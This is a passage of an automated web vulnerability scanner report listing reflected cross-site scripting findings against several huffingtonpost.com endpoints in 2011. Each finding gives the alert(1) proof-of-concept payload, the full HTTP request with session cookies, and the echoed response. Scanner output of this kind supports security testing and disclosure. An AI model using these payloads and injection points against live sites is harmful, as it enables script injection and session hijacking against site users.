2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The value of the spot request parameter is copied into the HTML document as plain text between tags. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
